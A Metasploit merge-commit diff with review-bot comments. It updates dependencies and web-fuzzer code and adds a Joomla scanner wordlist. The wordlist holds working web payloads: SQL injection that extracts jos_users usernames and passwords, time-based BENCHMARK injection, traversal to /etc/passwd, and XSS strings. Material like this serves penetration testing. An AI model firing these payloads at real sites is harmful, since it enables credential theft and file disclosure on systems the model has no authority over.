Merge branch 'rapid7' into sonicwall_gms

Conflicts:
	modules/exploits/multi/http/sonicwall_gms_upload.rb

Adds a loop around triggering the WAR payload, which was causing some
unreliability with the Java target.
bug/bundler_fix
James Lee 2013-02-07 21:53:49 -06:00
commit 071df7241b
144 changed files with 4547 additions and 497 deletions


@ -2,12 +2,8 @@ source 'http://rubygems.org'
# Need 3+ for ActiveSupport::Concern
gem 'activesupport', '>= 3.0.0'
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0'
group :development do
# Markdown formatting for yard
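Review bot: The new metasploit_data_models line still fetches over `git://`, an unauthenticated and unencrypted transport, and pins only to a tag, which can be moved; it is the `revision:` in Gemfile.lock that actually fixes the commit, so an install without the lockfile gets whatever the tag points at when it runs. Consider `gem 'metasploit_data_models', :git => 'https://github.com/rapid7/metasploit_data_models.git', :ref => '<full SHA from Gemfile.lock>'` so the transport is authenticated and the pin is immutable. The pg dependency moving above the git source is harmless but worth a one-line comment if the order matters to anything.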


@ -1,10 +1,10 @@
GIT
remote: git://github.com/rapid7/metasploit_data_models.git
revision: 73f26789500f278dd6fd555e839d09a3b81a05f4
tag: 0.3.0
revision: 448c1065329efea1eac76a3897f626f122666743
tag: 0.4.0
specs:
metasploit_data_models (0.3.0)
activerecord
metasploit_data_models (0.4.0)
activerecord (>= 3.2.10)
activesupport
pg
pry
@ -12,15 +12,15 @@ GIT
GEM
remote: http://rubygems.org/
specs:
activemodel (3.2.9)
activesupport (= 3.2.9)
activemodel (3.2.11)
activesupport (= 3.2.11)
builder (~> 3.0.0)
activerecord (3.2.9)
activemodel (= 3.2.9)
activesupport (= 3.2.9)
activerecord (3.2.11)
activemodel (= 3.2.11)
activesupport (= 3.2.11)
arel (~> 3.0.2)
tzinfo (~> 0.3.29)
activesupport (3.2.9)
activesupport (3.2.11)
i18n (~> 0.6)
multi_json (~> 1.0)
arel (3.0.2)
@ -57,10 +57,8 @@ PLATFORMS
ruby
DEPENDENCIES
activerecord
activesupport (>= 3.0.0)
metasploit_data_models!
pg (>= 0.11)
rake
redcarpet
rspec (>= 2.12)

Binary file not shown.


@ -1,20 +0,0 @@
class AddCredFileTable < ActiveRecord::Migration
def self.up
create_table :cred_files do |t|
t.integer :workspace_id, :null => false, :default => 1
t.string :path, :limit => 1024
t.string :ftype, :limit => 16
t.string :created_by
t.string :name, :limit => 512
t.string :desc, :limit => 1024
t.timestamps
end
end
def self.down
drop_table :cred_files
end
end

627
data/wordlists/joomla.txt Executable file

@ -0,0 +1,627 @@
&controller=../../../../../../../../../../../../[LFI]%00
?1.5.10-x
?1.5.11-x-http_ref
?1.5.11-x-php-s3lf
?1.5.3-path-disclose
?1.5.3-spam
?1.5.8-x
?1.5.9-x
?j1012-fixate-session
?option=com_mysms&Itemid=0&task=phonebook
Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
admin/
administrator/
administrator/components/
administrator/components/com_a6mambocredits/
administrator/components/com_a6mambohelpdesk/
administrator/components/com_admin/admin.admin.html.php
administrator/components/com_astatspro/refer.php
administrator/components/com_bayesiannaivefilter/
administrator/components/com_chronocontact/excelwriter/PPS/File.php
administrator/components/com_colophon/
administrator/components/com_colorlab/
administrator/components/com_comprofiler/
administrator/components/com_comprofiler/plugin.class.php
administrator/components/com_cropimage/admin.cropcanvas.php
administrator/components/com_extplorer/
administrator/components/com_feederator/includes/tmsp/add_tmsp.php
administrator/components/com_googlebase/
administrator/components/com_installer
administrator/components/com_jcs/
administrator/components/com_jim/
administrator/components/com_jjgallery/
administrator/components/com_joom12pic/
administrator/components/com_joomla-visites/
administrator/components/com_joomla_flash_uploader/
administrator/components/com_joomlaflashfun/
administrator/components/com_joomlaradiov5/
administrator/components/com_jpack/
administrator/components/com_jreactions/
administrator/components/com_juser/
administrator/components/com_admin/
administrator/components/com_kochsuite /
administrator/components/com_linkdirectory/
administrator/components/com_livechat/getSavedChatRooms.php
administrator/components/com_livechat/xmlhttp.php
administrator/components/com_lurm_constructor/admin.lurm_constructor.php
administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
administrator/components/com_mambelfish/
administrator/components/com_mgm/
administrator/components/com_mmp/help.mmp.php
administrator/components/com_mosmedia/
administrator/components/com_multibanners/extadminmenus.class.php
administrator/components/com_panoramic/
administrator/components/com_peoplebook/param.peoplebook.php
administrator/components/com_phpshop/toolbar.phpshop.html.php
administrator/components/com_remository/admin.remository.php
administrator/components/com_serverstat/install.serverstat.php
administrator/components/com_simpleswfupload/uploadhandler.php");
administrator/components/com_swmenupro/
administrator/components/com_treeg/
administrator/components/com_uhp/
administrator/components/com_uhp2/
administrator/components/com_webring/
administrator/components/com_wmtgallery/
administrator/components/com_wmtportfolio/
administrator/components/com_x-shop/
administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
administrator/index.php?option=com_searchlog&act=log
ajaxim/
akocomments.php
cart?Itemid=[SQLi]
component/com__brightweblinks/
component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
component/osproperty/?task=agent_register
component/quran/index.php?option=com_quran&action=viewayat&surano=
components/com_ clickheat/
components/com_5starhotels/
components/com_Jambook/jambook.php
components/com_a6mambocredits/
components/com_a6mambohelpdesk/
components/com_ab_gallery/
components/com_acajoom/
components/com_acctexp/
components/com_aclassf/
components/com_activities/
components/com_actualite/
components/com_admin/admin.admin.html.php
components/com_advancedpoll/
components/com_agora/
components/com_agoragroup/
components/com_ajaxchat/
components/com_akobook/
components/com_akocomment/
components/com_akogallery
components/com_alberghi/
components/com_allhotels/
components/com_alphacontent/
components/com_altas/
components/com_amocourse/
components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
components/com_articles/
components/com_artist/
components/com_artlinks/
components/com_asortyment/
components/com_astatspro/
components/com_awesom/
components/com_babackup/
components/com_banners/
components/com_bayesiannaivefilter/
components/com_be_it_easypartner/
components/com_beamospetition/
components/com_biblestudy/
components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
components/com_blog/
components/com_bookflip/
components/com_bookjoomlas/
components/com_booklibrary/
components/com_books/
components/com_bsadv/
components/com_bsq_sitestats/
components/com_bsq_sitestats/external/rssfeed.php
components/com_bsqsitestats/
components/com_calendar/
components/com_camelcitydb2/
components/com_candle/
components/com_casino_blackjack/
components/com_casino_videopoker/
components/com_casinobase/
components/com_catalogproduction/
components/com_catalogshop/
components/com_category/
components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
components/com_chronocontact/excelwriter/PPS/File.php
components/com_cinema/
components/com_clasifier/
components/com_classifieds/
components/com_clickheat/
components/com_cloner/
components/com_cmimarketplace/
components/com_cms/
components/com_colophon/
components/com_colorlab/
components/com_competitions/
components/com_comprofiler/
components/com_comprofiler/plugin.class.php
components/com_contactinfo/
components/com_content/
components/com_cpg/cpg.php
components/com_cropimage/admin.cropcanvas.php
components/com_custompages/
components/com_cx/
components/com_d3000/
components/com_dadamail/
components/com_dailymessage/
components/com_datsogallery/
components/com_dbquery/
components/com_detail/
components/com_digistore/
components/com_directory/
components/com_djiceshoutbox/
components/com_doc/
components/com_downloads/
components/com_ds-syndicate/
components/com_dtregister/
components/com_dv/externals/phpupload/upload.php");
components/com_easybook/
components/com_emcomposer/
components/com_equotes/
components/com_estateagent/
components/com_eventing/
components/com_eventlist/
components/com_events/
components/com_ewriting/
components/com_expose/uploadimg.php
components/com_expshop/
components/com_extcalendar/
components/com_extcalendar/cal_popup.php?extmode=view&extid=
components/com_extcalendar/extcalendar.php
components/com_extended_registration/registration_detailed.inc.php
components/com_extplorer/
components/com_ezine/
components/com_ezstore/
components/com_facileforms/
components/com_fantasytournament/
components/com_faq/
components/com_feederator/includes/tmsp/add_tmsp.php
components/com_filebase/
components/com_filiale/
components/com_flashfun/
components/com_flashmagazinedeluxe/
components/com_flippingbook/
components/com_flyspray/startdown.php
components/com_fm/fm.install.php
components/com_foevpartners/
components/com_football/
components/com_formtool/
components/com_forum/
components/com_fq/
components/com_fundraiser/
components/com_galeria/
components/com_galleria/galleria.html.php
components/com_gallery/
components/com_game/
components/com_gameq/
components/com_garyscookbook/
components/com_genealogy/
components/com_geoboerse/
components/com_gigcal/
components/com_gmaps/
components/com_googlebase/
components/com_gsticketsystem/
components/com_guide/
components/com_hashcash/server.php
components/com_hbssearch/
components/com_hello_world/
components/com_hotproperties/
components/com_hotproperty/
components/com_hotspots/
components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
components/com_hwdvideoshare/
components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
components/com_ice/
components/com_idoblog/
components/com_idvnews/
components/com_ignitegallery/
components/com_ijoomla_archive/
components/com_ijoomla_rss/
components/com_inter/
components/com_ionfiles/
components/com_is/
components/com_ixxocart/
components/com_jabode/
components/com_jashowcase/
components/com_jb2/
components/com_jce/
components/com_jcs/
components/com_jd-wiki/
components/com_jd-wp/
components/com_jim/
components/com_jjgallery/
components/com_jmovies/
components/com_jobline/
components/com_jombib/
components/com_joobb/
components/com_jooget/
components/com_joom12pic/
components/com_joomla-visites/
components/com_joomla_flash_uploader/
components/com_joomlaboard/
components/com_joomladate/
components/com_joomlaflashfun/
components/com_joomlalib/
components/com_joomlaradiov5/
components/com_joomlavvz/
components/com_joomlaxplorer/
components/com_joomloads/
components/com_joomradio/
components/com_joomtracker/
components/com_joovideo/
components/com_jotloader/
components/com_journal/
components/com_jpack/
components/com_jpad/
components/com_jreactions/
components/com_jreviews/scripts/xajax.inc.php
components/com_jumi/
components/com_juser/
components/com_jvideo/
components/com_k2/
components/com_kbase/
components/com_knowledgebase/fckeditor/fckeditor.js
components/com_kochsuite /
components/com_kunena/
components/com_letterman/
components/com_lexikon/
components/com_linkdirectory/
components/com_listoffreeads/
components/com_livechat/getSavedChatRooms.php
components/com_livechat/xmlhttp.php
components/com_liveticker/
components/com_lm/
components/com_lmo/
components/com_loudmounth/includes/abbc/abbc.class.php
components/com_loudmouth/
components/com_lowcosthotels/
components/com_lurm_constructor/admin.lurm_constructor.php
components/com_mad4joomla/
components/com_madeira/img.php
components/com_maianmusic/
components/com_mailarchive/
components/com_mailto/
components/com_mambatstaff/mambatstaff.php
components/com_mambelfish/
components/com_mambospgm/
components/com_mambowiki/MamboLogin.php
components/com_marketplace/
components/com_mcquiz/
components/com_mdigg/
components/com_media_library/
components/com_mediaslide/
components/com_mezun/
components/com_mgm/
components/com_minibb/
components/com_misterestate/
components/com_mmp/help.mmp.php
components/com_model/
components/com_moodle/moodle.php
components/com_moofaq/
components/com_mosmedia/
components/com_mospray/scripts/admin.php
components/com_mosres/
components/com_most/
components/com_mp3_allopass/
components/com_mtree/
components/com_mtree/img/listings/o/{id}.php
components/com_multibanners/extadminmenus.class.php
components/com_myalbum/
components/com_mycontent/
components/com_mydyngallery/
components/com_mygallery/
components/com_n-forms/
components/com_na_content/
components/com_na_mydocs/
components/com_na_newsdescription/
components/com_na_qforms/
components/com_neogallery/
components/com_neorecruit/
components/com_neoreferences/
components/com_netinvoice/
components/com_news/
components/com_news_portal/
components/com_newsflash/
components/com_nfn_addressbook/
components/com_nicetalk/
components/com_noticias/
components/com_omnirealestate/
components/com_omphotogallery/
components/com_ongumatimesheet20/
components/com_onlineflashquiz/
components/com_ownbiblio/
components/com_panoramic/
components/com_paxgallery/
components/com_paxxgallery/
components/com_pcchess/
components/com_pcchess/include.pcchess.php
components/com_pccookbook/
components/com_pccookbook/pccookbook.php
components/com_peoplebook/param.peoplebook.php
components/com_performs/
components/com_philaform/
components/com_phocadocumentation/
components/com_php/
components/com_phpshop/toolbar.phpshop.html.php
components/com_pinboard/
components/com_pms/
components/com_poll/
components/com_pollxt/
components/com_ponygallery/
components/com_portafolio/
components/com_portfol/
components/com_prayercenter/
components/com_pro_desk/
components/com_prod/
components/com_productshowcase/
components/com_profiler/
components/com_projectfork/
components/com_propertylab/
components/com_puarcade/
components/com_publication/
components/com_quiz/
components/com_rapidrecipe/
components/com_rdautos/
components/com_realestatemanager/
components/com_recly/
components/com_referenzen/
components/com_rekry/
components/com_remository/admin.remository.php
components/com_remository_files/file_image_14/1276100016shell.php
components/com_reporter/processor/reporter.sql.php
components/com_resman/
components/com_restaurante/
components/com_ricette/
components/com_rsfiles/
components/com_rsgallery/
components/com_rsgallery2/
components/com_rss/
components/com_rssreader/
components/com_rssxt/
components/com_rwcards/
components/com_school/
components/com_search/
components/com_sebercart/getPic.php?p=[LFD]%00
components/com_securityimages/
components/com_sef/
components/com_seminar/
components/com_serverstat/install.serverstat.php
components/com_sg/
components/com_simple_review/
components/com_simpleboard/
components/com_simplefaq/
components/com_simpleshop/
components/com_sitemap/sitemap.xml.php
components/com_slideshow/
components/com_smf/
components/com_smf/smf.php
components/com_swmenupro/
components/com_team/
components/com_tech_article/
components/com_thopper/
components/com_thyme/
components/com_tickets/
components/com_tophotelmodule/
components/com_tour_toto/
components/com_trade/
components/com_uhp/
components/com_uhp2/
components/com_user/controller.php
components/com_users/
components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
components/com_vehiclemanager/
components/com_versioning /
components/com_videodb/core/videodb.class.xml.php
components/com_virtuemart/
components/com_volunteer/
components/com_vr/
components/com_waticketsystem/
components/com_webhosting/
components/com_weblinks/
components/com_webring/
components/com_wmtgallery/
components/com_wmtportfolio/
components/com_x-shop/
components/com_xevidmegahd/
components/com_xewebtv/
components/com_xfaq/
components/com_xgallery/helpers/img.php?file=
components/com_xsstream-dm/
components/com_ynews/
components/com_yvcomment/
components/com_zoom/classes/
components/mod_letterman/
components/remository/
eXtplorer/
easyblog/entry/uncategorized
extplorer/
components/com_mtree/img/listings/o/{id}.php where {id}
includes/joomla.php
index.php/404'
index.php/?option=com_question&catID=21' and+1=0 union all
index.php/image-gallery/"><script>alert('xss')</script>/25-koala
index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&amp;type=css&v=1
index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
index.php?option=com_aardvertiser&cat_name=conf&task=<=
index.php?option=com_aardvertiser&task=
index.php?option=com_abc&view=abc&letter=AS&sectionid='
index.php?option=com_advert&id=36'
index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
index.php?option=com_alfurqan15x&action=viewayat&surano=
index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
index.php?option=com_annonces&view=edit&Itemid=1
index.php?option=com_articleman&task=new
index.php?option=com_bbs&bid=-1
index.php?option=com_beamospetition&startpage=3&pet=-
index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
index.php?option=com_chronoconnectivity&itemid=1
index.php?option=com_chronocontact&itemid=1
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
index.php?option=com_clantools&squad=1+
index.php?option=com_clantools&task=clanwar&showgame=1+
index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
index.php?option=com_commedia&task=page&commpid=21
index.php?option=com_connect&view=connect&controller=
index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_dioneformwizard&controller=[LFI]%00
index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
index.php?option=com_easyfaq&Itemid=1&task=view&gid=
index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
index.php?option=com_easyfaq&task=view&contact_id=
index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
index.php?option=com_equipment&task=components&id=45&sec_men_id=
index.php?option=com_equipment&view=details&id=
index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
index.php?option=com_etree&view=displays&layout=category&id=[SQL]
index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
index.php?option=com_filecabinet&task=download&cid[]=7
index.php?option=com_firmy&task=section_show_set&Id=-1
index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
index.php?option=com_graphics&controller=
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
index.php?option=com_huruhelpdesk&view=detail
index.php?option=com_huruhelpdesk&view=detail&cid[0]=
index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
index.php?option=com_iproperty&view=agentproperties&id=
index.php?option=com_jacomment&view=
index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_jcommunity&controller=members&task=1'
index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_jfuploader&Itemid=
index.php?option=com_jgen&task=view&id=
index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
index.php?option=com_jimtawl&Itemid=12&task=
index.php?option=com_jmarket&controller=product&task=1'
index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
index.php?option=com_jomdirectory&task=search&type=111+
index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
index.php?option=com_joomla_flash_uploader&Itemid=1
index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
index.php?option=com_joomtouch&controller=
index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
index.php?option=com_jstore&controller=product-display&task=1'
index.php?option=com_jsubscription&controller=subscription&task=1'
index.php?option=com_jtickets&controller=ticket&task=1'
index.php?option=com_konsultasi&act=detail&sid=
index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
index.php?option=com_kunena&func=userlist&search=
index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
index.php?option=com_matamko&controller=
index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
index.php?option=com_neorecruit&task=offer_view&id=
index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
index.php?option=com_noticeboard&controller=
index.php?option=com_obsuggest&controller=
index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
index.php?option=com_oziogallery&Itemid=
index.php?option=com_page&id=53
index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
index.php?option=com_phocagallery&view=categories&Itemid=
index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_php&file=../../../../../../../../../../etc/passwd
index.php?option=com_php&file=../images/phplogo.jpg
index.php?option=com_php&file=../js/ie_pngfix.js
index.php?option=com_ponygallery&Itemid=[sqli]
index.php?option=com_products&catid=-1
index.php?option=com_products&id=-1
index.php?option=com_products&product_id=-1
index.php?option=com_products&task=category&catid=-1
index.php?option=com_properties&task=agentlisting&aid=
index.php?option=com_qcontacts&Itemid=1'
index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_restaurantguide&view=country&id='&Itemid=69
index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
index.php?option=com_seyret&view=
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
index.php?option=com_smartsite&controller=
index.php?option=com_spa&view=spa_product&cid=
index.php?option=com_spidercalendar
index.php?option=com_spidercalendar&date=1'
index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_staticxt&staticfile=test.php&id=1923
index.php?option=com_szallasok&mode=8&id=25 (SQL)
index.php?option=com_tag&task=tag&tag=
index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
index.php?option=com_ultimateportfolio&controller=
index.php?option=com_users&view=registration
index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_x-shop&action=artdetail&idd='
index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
index.php?option=com_xcomp&controller=../../[LFI]%00
index.php?option=com_xvs&controller=../../[LFI]%00
index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
index.php?option=com_yjcontactus&view=
index.php?option=com_youtube&id_cate=4
index.php?option=com_zina&view=zina&Itemid=9
index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
index.php?search=NoGe&option=com_esearch&searchId=
index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
js/index.php?option=com_socialads&view=showad&Itemid=94
libraries/joomla/utilities/compat/php50x.php
libraries/pcl/pcltar.php
libraries/phpmailer/phpmailer.php
libraries/phpxmlrpc/xmlrpcs.php
modules/mod_artuploader/upload.php");
modules/mod_as_category.php
modules/mod_calendar.php
modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
modules/mod_jfancy/script.php");
modules/mod_ppc_simple_spotlight/elements/upload_file.php
modules/mod_ppc_simple_spotlight/img/
modules/mod_pxt/
modules/mod_quick_question.php
modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
patch/makedown.php?arquivo=../../../../etc/passwd
plugins/content/efup_files/helper.php");
plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
plugins/editors/xstandard/attachmentlibrary.php
print.php?task=person&id=36 and 1=1
templates/be2004-2/
templates/ja_purity/
wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
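Review bot: Several entries are not paths but residue from whatever the list was scraped from: the lines ending in `");` (for example `administrator/components/com_simpleswfupload/uploadhandler.php");` and `modules/mod_jfancy/script.php");`), the HTML fragment `plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">`, the truncated sentence `components/com_mtree/img/listings/o/{id}.php where {id}`, and `index.php?option=com_myhome&task=4&nidimm` pasted twice onto one line. Anything iterating this file will request those strings verbatim, which is wasted traffic and noise in the results, so they should be trimmed to the bare path or dropped. Entries with a space before the slash, such as `administrator/components/com_kochsuite /` and `components/com_versioning /`, look like the same kind of defect.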


@ -260,7 +260,8 @@ public abstract class RpcConnection {
// Don't fork cause we'll check if it dies
String rpcType = "Basic";
java.util.List args = new java.util.ArrayList(java.util.Arrays.asList(new String[]{
"msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1"}));
"msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1",
"-p",Integer.toString(defaultPort)}));
if(!defaultSsl)
args.add("-S");
if(disableDb)


@ -250,7 +250,9 @@ module Auxiliary::Web
if !(payload = opts[:payload])
if payloads
payload = payloads.select{ |p| element.altered_value.include?( p ) }.first
payload = payloads.select { |p|
element.altered_value.include?( p )
}.sort_by { |p| p.size }.last
end
end
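Review bot: The longest-match selection on the new lines reads more directly as `payload = payloads.select { |p| element.altered_value.include?( p ) }.max_by(&:size)`, which avoids sorting the whole list; when nothing matches the result is still nil, as with `.last`, though tie-breaking among equal-length payloads may differ. The same `select { … }.sort_by { |p2| p2.size }.last` shape appears in the Analysis::Timing hunk and can take the same form. The enclosing method starts and ends outside this hunk.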


@ -101,7 +101,7 @@ module Analysis::Differential
# save the response and some data for analysis
responses[:good][elem.altered] << {
'res' => res,
'elem' => elem
'elem' => elem.dup
}
end
end
@ -122,8 +122,7 @@ module Analysis::Differential
http.if_not_custom_404( action, res['res'].body ) do
# if this isn't a custom 404 page then it means that
# the element is vulnerable, so go ahead and log the issue
fuzzer.process_vulnerability( res['elem'], 'Manipulatable responses.',
:payload => res['elem'].altered_value )
fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.' )
end
end
end
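Review bot: The new `fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.' )` drops the `:payload => res['elem'].altered_value` detail the old call recorded, so the logged finding no longer states which value produced the differing response unless process_vulnerability derives it from the element itself; if that loss is unintended, keep the option: `fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.', :payload => res['elem'].altered_value )`. The `elem.dup` in the first hunk is a shallow copy, so it only protects against the element object itself being mutated afterwards, not nested state it references — presumably sufficient here, but worth confirming. Both enclosing blocks extend beyond their hunks.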


@ -54,7 +54,8 @@ module Analysis::Timing
timeout = opts[:delay]
seed = p.altered_value.dup
payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.first
payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.
sort_by { |p2| p2.size }.last
# 1st pass, make sure the webapp is responsive
if_responsive do


@ -120,10 +120,15 @@ class Auxiliary::Web::HTTP
tl = []
loop do
# Spawn threads for each host
while tl.size <= (opts[:max_threads] || 5) && !@queue.empty? && (req = @queue.pop)
tl << framework.threads.spawn( "#{self.class.name} - #{req})", false, req ) do |request|
# Keep callback failures isolated.
begin
request.handle_response request( request.url, request.opts )
rescue => e
elog e.to_s
e.backtrace.each { |l| elog l }
end
end
end
@ -291,7 +296,12 @@ class Auxiliary::Web::HTTP
Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout )
